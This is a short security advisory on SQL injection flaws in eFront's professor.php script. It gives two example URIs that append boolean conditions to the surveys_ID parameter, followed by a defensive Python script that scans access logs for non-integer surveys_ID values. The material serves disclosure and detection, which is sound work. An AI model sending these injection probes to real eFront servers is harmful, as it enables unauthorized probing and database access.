eFront 'professor.php' Script Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

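The following example URIs are available. Both target the surveys_ID parameter of professor.php and differ only in the condition appended to it (1=0 in the first, 1=1 in the second).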

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0--

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1--
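For defenders reviewing web server logs, the following is an added example (not part of the original advisory or of eFront) that flags requests to professor.php whose surveys_ID value is not a plain integer. It assumes combined-format access logs and that legitimate surveys_ID values are decimal integers; the log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and parameter names are taken from the example URIs above.
SCRIPT = "professor.php"
PARAM = "surveys_ID"
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for each request to professor.php
    whose surveys_ID is not a plain decimal integer (assumed legitimate form)."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + SCRIPT):
            continue
        # parse_qs percent-decodes and maps '+' to a space, so the value is
        # compared in the form the application would receive it.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if not re.fullmatch(r"\d+", value):
                hits.append((n, value))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0-- HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2010:10:00:06 +0000] "GET /enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1-- HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2010:10:00:09 +0000] "GET /enterprise/www/index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {n}: {PARAM}={value!r}")
```

The same integer-only rule, enforced in the application before the value reaches a query, is the corresponding input-validation control.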


 

Copyright 2010, SecurityFocus